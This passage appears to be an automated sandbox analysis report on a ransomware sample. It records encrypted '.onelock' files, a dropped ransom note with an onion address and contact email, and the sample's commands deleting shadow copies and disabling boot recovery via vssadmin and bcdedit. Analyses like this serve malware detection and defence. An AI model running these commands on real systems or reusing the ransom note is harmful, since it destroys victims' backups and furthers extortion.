                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps09
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa04
                        Source: 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drString found in binary or memory: https://protonmail.com
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drString found in binary or memory: https://www.torproject.org
                        Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 
1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                        Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49683 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: 98j0BL6iLT.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui entropy: 7.99772312559
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui entropy: 7.99582795966
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Recovery\WindowsRE\boot.sdi entropy: 7.9999318449
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi entropy: 7.99981297736
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui entropy: 7.99730426679
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui entropy: 7.99754253078
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Recovery\WindowsRE\Winre.wim entropy: 7.99958172984
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\bootmgfw.efi entropy: 7.99983515108
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\bootmgr.efi entropy: 7.99984657106
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui entropy: 7.99787679044
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui entropy: 7.99752193403
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui entropy: 7.99639777267
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui entropy: 7.99791255865
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui entropy: 7.99769643136
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui entropy: 7.99617858606
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui entropy: 7.99820541999
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui entropy: 7.99761840026
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui entropy: 7.99649440624
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui entropy: 7.99746028099
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi entropy: 7.99994132027
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\Recovery\WindowsRE\boot.sdi.onelock (copy) entropy: 7.9999318449
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Adobe\ARM\S\436\AdobeARM.msi.onelock (copy) entropy: 7.99981297736
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui.onelock (copy) entropy: 7.99730426679
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui.onelock (copy) entropy: 7.99754253078
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\bootmgfw.efi.onelock (copy) entropy: 7.99983515108
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\bootmgr.efi.onelock (copy) entropy: 7.99984657106
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui.onelock (copy) entropy: 7.99787679044
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui.onelock (copy) entropy: 7.99752193403
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui.onelock (copy) entropy: 7.99639777267
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui.onelock (copy) entropy: 7.99791255865
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui.onelock (copy) entropy: 7.99769643136
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui.onelock (copy) entropy: 7.99617858606
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui.onelock (copy) entropy: 7.99820541999
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui.onelock (copy) entropy: 7.99761840026
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui.onelock (copy) entropy: 7.99649440624
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui.onelock (copy) entropy: 7.99746028099
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui.onelock (copy) entropy: 7.99772312559
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.onelock (copy) entropy: 7.99994132027
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Y:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui.onelock (copy) entropy: 7.99582795966
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\Recovery\WindowsRE\Winre.wim.onelock (copy) entropy: 7.99958172984
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\Recovery\WindowsRE\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\ARM\S\436\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\bg-BG\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\cs-CZ\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\da-DK\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\de-DE\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: 98j0BL6iLT.exe, 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: svhost.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: svhost.exe, 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: svhost.exe, 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: vssadmin.exe, 00000004.00000002.258671573.00000000033C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet^n2M
                        Source: vssadmin.exe, 00000004.00000002.258428437.0000000002BDC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00002304- TID: 00001768- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=computerUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsB|?A
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00002304- TID: 00001768- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000004.00000002.258470948.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default
                        Source: vssadmin.exe, 00000009.00000002.261277363.0000000003360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default
                        Source: vssadmin.exe, 00000009.00000002.261109888.0000000002F4B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005908- TID: 00005904- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000009.00000002.261522788.0000000003620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet
